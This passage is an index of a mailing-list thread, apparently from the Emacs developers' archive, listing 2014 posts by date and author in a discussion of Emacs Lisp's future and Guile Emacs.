2014-10-15 13:16                                                                         ` Richard Stallman
2014-10-15 14:32                                                                           ` Eli Zaretskii
2014-10-15 14:43                                                                             ` David Kastrup
2014-10-16 18:12                                                                               ` Richard Stallman
2014-10-13  3:46                                                                 ` Richard Stallman
2014-10-09 11:27                                                       ` Eli Zaretskii
2014-10-10 14:23                                                   ` Richard Stallman
2014-10-10 14:23                                                 ` Richard Stallman
2014-10-10 20:41                                       ` Mark H Weaver
2014-10-10 21:56                                         ` Christopher Allan Webber
2014-10-10 22:56                                           ` Drew Adams
2014-10-11  1:17                                         ` Richard Stallman
2014-09-27 17:04                       ` Taylan Ulrich Bayirli/Kammer
2014-09-27 19:33                       ` Robin Templeton
2014-09-28  7:17                         ` David Kastrup
2014-09-27 15:34                 ` Stephen J. Turnbull
2014-09-29 13:17             ` K. Handa
  -- strict thread matches above, loose matches on Subject: below --
2014-09-17  8:22 Emacs Lisp's future (was: Guile emacs thread (again)) Nic Ferrier
2014-09-17  2:57 Lally Singh
2014-09-17 11:01 ` Tom
2014-09-17 11:43 ` Richard Stallman
2014-09-17 14:21   ` Lally Singh
2014-09-11 16:29 Guile emacs thread (again) Christopher Allan Webber
2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier
2014-09-16 16:03   ` Lennart Borgman
2014-09-17 18:24     ` Jorgen Schaefer
2014-09-17 19:25       ` Lally Singh
2014-09-18  2:07       ` Alexis
2014-09-18  8:43     ` Emilio Lopes
2014-09-16 16:09   ` Eli Zaretskii
2014-09-16 16:54   ` Lars Brinkhoff
